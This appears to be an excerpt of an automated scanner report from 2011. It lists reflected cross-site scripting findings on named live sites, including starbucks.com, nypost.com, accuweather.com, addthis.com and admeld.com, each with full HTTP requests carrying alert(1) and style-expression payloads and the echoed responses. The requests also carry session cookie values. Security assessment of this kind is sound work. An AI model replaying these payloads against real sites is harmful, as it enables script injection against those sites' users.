The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79d22"style="x:expression(alert(1))"59609b14b2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /smooth/?79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:29:16 GMT Connection: close Content-Length: 35424
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/smooth?79d22"style="x:expression(alert(1))"59609b14b2a=1"/> ...[SNIP]...
1.934. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/store-locator
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8188"style="x:expression(alert(1))"8d18f2f6526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /store-locator?d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:22 GMT Connection: close Content-Length: 39988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/store-locator?d8188"style="x:expression(alert(1))"8d18f2f6526=1"/> ...[SNIP]...
1.935. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/whats-new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff0ed"style="x:expression(alert(1))"b9ac111388f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whats-new?ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:25:48 GMT Connection: close Content-Length: 46436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/whats-new?ff0ed"style="x:expression(alert(1))"b9ac111388f=1"/> ...[SNIP]...
1.936. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/set-auto-reload
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6593"style%3d"x%3aexpression(alert(1))"22e223ad474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6593"style="x:expression(alert(1))"22e223ad474 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/set-auto-reload?c6593"style%3d"x%3aexpression(alert(1))"22e223ad474=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:32:52 GMT Connection: close Content-Length: 36061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/set-auto-reload?c6593"style="x:expression(alert(1))"22e223ad474=1" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca3b"><script>alert(1)</script>7db7a0d510a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 6ca3b"><script>alert(1)</script>7db7a0d510a
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:47:15 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-15 Content-Length: 19280
<?xml version="1.0" encoding="iso-8859-15"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="de" xmlns="http://www.w3.org/1999/x ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=6ca3b"><script>alert(1)</script>7db7a0d510a&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f20a"><script>alert(1)</script>3d914677669 was submitted in the Referer HTTP header. This input was echoed as 7f20a\"><script>alert(1)</script>3d914677669 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /2007/01/25/jquery-tutorial-text-box-hints/ HTTP/1.1 Host: remysharp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7f20a"><script>alert(1)</script>3d914677669
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 04:46:23 GMT Server: Apache/1.3.37 (Unix) DAV/1.0.3 mod_gzip/1.3.26.1a PHP/5.2.3 Vary: * X-Powered-By: PHP/5.2.3 X-Pingback: http://remysharp.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head profile="htt ...[SNIP]... <img src="http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=9893019971&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=http://remysharp.com&utmr=http://www.google.com/search?hl=en&q=7f20a\"><script>alert(1)</script>3d914677669&utmp=/noscript&utmac=UA-1656750-1&utmcc=__utma%3D31852167.1310524236.1297140383.1297140383.1297140383.2%3B%2B__utmb%3D31852167%3B%2B__utmc%3D31852167%3B%2B__utmz%3D31852167.1297140383.2.2.utmccn%3D(di ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73825"><script>alert(1)</script>0891e736ddd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /homedelivery/signup.htm HTTP/1.1 Host: secure.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=73825"><script>alert(1)</script>0891e736ddd
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:26:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.0 Content-Length: 5982 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerNYPOST-SSL-POOL=184592576.47873.0000; expires=Tue, 08-Feb-2011 10:26:38 GMT; path=/
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3929</script><script>alert(1)</script>4ab41175fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e3929</script><script>alert(1)</script>4ab41175fa
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public Date: Tue, 08 Feb 2011 05:30:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Thu, 10-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/ Content-Length: 64370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=e3929</script><script>alert(1)</script>4ab41175fa'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab13</script><script>alert(1)</script>0fa26e46d41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3ab13</script><script>alert(1)</script>0fa26e46d41
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public Date: Tue, 08 Feb 2011 05:30:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Thu, 10-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/ Content-Length: 63915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=3ab13</script><script>alert(1)</script>0fa26e46d41'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 45cf2<script>alert(1)</script>8b1f3293568 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=45cf2<script>alert(1)</script>8b1f3293568
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:20 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>45cf2<script>alert(1)</script>8b1f3293568 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d2b4"><script>alert(1)</script>ff24fd18487 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3d2b4"><script>alert(1)</script>ff24fd18487
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=3d2b4"><script>alert(1)</script>ff24fd18487" /> ...[SNIP]...
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc83"><script>alert(1)</script>098d591dd19 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556dbc83"><script>alert(1)</script>098d591dd19; D41U=3ZZjLFmqycm2frJLZ_kZy1oQmD1O5XQTx1XkdK5tvcaDMd9HrC3OCkg; __qca=P0-46912658-1297086919048
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTQsICBzaXRlOiAgICAgICAgICJueXBvc3QiLCAgYWQ6ICAgICAgICAgICAzMjEyLCAgbmV0d29yazogICAgICAiYWRicml0ZSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYzQ0MWY5NDgtNDlkNi00MjQ5LWIxZjMtZGEyMmRhYzkxNDk2IiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NmRiYzgzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MDk4ZDU5MWRkMTkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImJlbG93LWZvbGQiLCAgZGl2OiAgICAgICAgICAiYzQ0MWY5NDgtNDlkNi00MjQ5LWIxZjMtZGEyMmRhYzkxNDk2IiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cubnlwb3N0LmNvbS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxOSwgIGFjY291bnRfaWQ6ICAgNDQ4LCAgbmV0d29ya19uYW1lOiAiQWRCcml0ZSIsICBwdWJsaXNoZXJfbmFtZTogIm55cG9zdCIsICBlY3BtOiAgICAgICAgICIwLjk1IiwgIGZlY3BtOiAgICAgICAgIjAuOTUiLCAgZmlsbDogICAgICAgICAiNDYuMzYiLCAgcGxhY2VtZW50OiAgICAiYmVsb3ctZm9sZCIsICBydWxlOiAgICAgICAgICJiZWxvdy1mb2xkIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6IkVuZ2FnZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIxNDYxNzcsICJidXkiOjU0OTgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNDc0NywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI5OTQyMSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE4OTIyNjEsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQWN1aXR5IEFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5MDA5NzQsICJidXkiOjUyMTAsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJFcWFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE3MTM3MTMsICJidXkiOjQyNTEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJGb3JiZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTYzNDE2LCAiYnV5Ijo3MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlNpdGUgU2NvdXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozNDgxMzY3LCAiYnV5Ijo4NzY4LCJscCI6Imh0dHA6Ly9uZXdzMXJlcG9ydHMuY29tL2RlZmF1bHQxMDA0Yy5hc3A/dmlldz0wJmZ1bm5lbGlkPUYxODAmYT1iJnNpdGVpZD1IUlMmdmlkPSIsImFuIjoiIiwic3RhdHVzIjoiYmxvY2tlZCBkb21haW4iLCJmaWQiOjI5MSwgImZjcG0iOiIxLjI3In1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ1In0= Content-Length: 2319 Content-Type: text/html Date: Tue, 08 Feb 2011 02:08:55 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3f4"><script>alert(1)</script>e21638af679 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55564c3f4"><script>alert(1)</script>e21638af679; D41U=3ZZjLFmqycm2frJLZ_kZy1oQmD1O5XQTx1XkdK5tvcaDMd9HrC3OCkg; __qca=P0-46912658-1297086919048
Response
